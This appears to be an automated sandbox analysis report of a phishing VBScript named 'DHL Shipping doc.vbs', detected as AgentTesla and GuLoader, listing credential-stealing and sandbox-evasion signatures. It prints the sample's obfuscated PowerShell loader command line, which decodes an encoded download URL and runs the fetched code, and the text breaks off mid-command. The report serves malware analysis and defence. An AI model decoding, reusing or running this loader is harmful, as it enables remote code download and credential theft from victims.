Edit tour
Windows
Analysis Report
DHL Shipping doc.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6556 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DHL S hipping do c.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6692 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Tarboosh = 1;$Ldre forvaltnin gen='Subst rin';$Ldre forvaltnin gen+='g';F unction Se lvstartere ns($Journa l){$Nomade invasionen s165=$Jour nal.Length -$Tarboosh ;For($Effe ctible=5; $Effectibl e -lt $Nom adeinvasio nens165; $ Effectible +=(6)){$La gringsform ers+=$Jour nal.$Ldref orvaltning en.Invoke( $Effectibl e, $Tarboo sh);}$Lagr ingsformer s;}functio n Spelean( $Surmaster ){. ($Repr oduktionst eknikkens) ($Surmast er);}$Uvel komne=Selv starterens 'PlummMSk ul oPolerz ,oliliOvul albestylvi .uiagen.e/ Bat.e5Vand p. ouse0Ba s,e Nove(A ntipW nyre i A.jenPrv .tdA.auaoA flgnw refo sPulve Sty ,kNPlyssTD ds y Super 1 Renl0Ove rb.Weste0b ned; catu LivreWAcq ueiSpeaknM yo,o6ran e 4 Sn g;Lut he Kintx r ose6Photo4 Bef t; odk e AlgerrPi mpsv Feis: nge1Eryth 2South1 Ov er.Flag 0F ,rce)debug AmeriG ,a rseRotuncF loppkKokle ofysio/kop if2Konom0T ipti1Lag.r 0Kalku0Opr et1S ksk0 A.cu1Unspr turbFstfr oiImpe.rWh or.eMa sif Unid,oLand .xNonf /Do ket1Sikke2 vrang1 Dec i.Mesom0 L ,ee ';$Yel lowfish=Se lvstartere ns 'G undU DimmosAfli re,onharIn cel- FradA D.utog R.c oe.orksn,e rdetHalen ';$Ellokom otiv242=Se lvstartere ns 'Falkeh elvetAdmi rtSyge.pny anls Th.n: Tugt / Lep i/A.pasdSb r dr Anchi s kkevSupe reFo.tm.Br easgRarefo Fonlo Bag eg CapslBe foreAlkoh. Granic,ejr soRecemmpl ate/ Vasku TeknocR.ll o?ItczeeRe scuxElevap VulsoUd,k arDermatIn si=Epilod CrampoLuks uw BortnT rmilAphelo Ne gaa dto ed cams&No nadi Glumd Noi.e=Amil l1Skrivx Q uinC .nsvK Kv.kkBro. hDSlovaLG nerKPupilk thuriBoat lJmortagHy droTkr,ptC sla p2Fips kNV ndu2Aa nds8Helleh druesjCath olSlagt0U tral ask1d et,c9Intru ULiderbAqu avuStenbxS l.ndJShove 6 Avisw Su bc9Overt ' ;$interses sional=Sel vstarteren s ' Stal>T idsd ';$Re produktion steknikken s=Selvstar terens 'By gniiCha me T.okx ,ne d ';$Guidi ng='Scop12 4';Spelean (Selvstar terens 'Vi rksSRiddee JointtStav e-Smr.aCFa rmeoCastrn RegistFirm aeMilten G .vetProev F,dst- ver P JubbaPer iotKrlhahT vrsk Forea T,econ:For ma\nedb,B BromiColle s pre i.ho todSand,dH ydraeSt,mm r Ho,neha, mon.sthe.U nurnt ilat xCo tatAlc on Sylve-F u,daV B.gs aindbelapp aruAars eS abi Ammo,$ P,atrG Non ruSo ediEx tradSrgeri RabunB is sgSigna;Sp e l ');Spe lean (Selv starterens ' .nneiJa ve,fDeleg Nonn(Frit. t TekseSoc rasLuft.tD ani,-Bead. pBalm,aQui ritfi.enhO lymp Nonna TAton,:Dec hi\ AadsB rakiiPrede sHektai Pj atdSkrendp recieUund. rVolleeBre snEquip.E genpt ashl xEnsilt,he re) ultr{ TromeGunna xPe muiGem entS,gne}E thno;Homes ');$Dilam ination = Selvstarte rens 'Yunp e Buttcko nkahTkkeso Neden Koma r% amma .a lvpErratpI ndhadKolle aMesmetAar boaParap%K onsu\Canto AObfuspBau xit rsenyT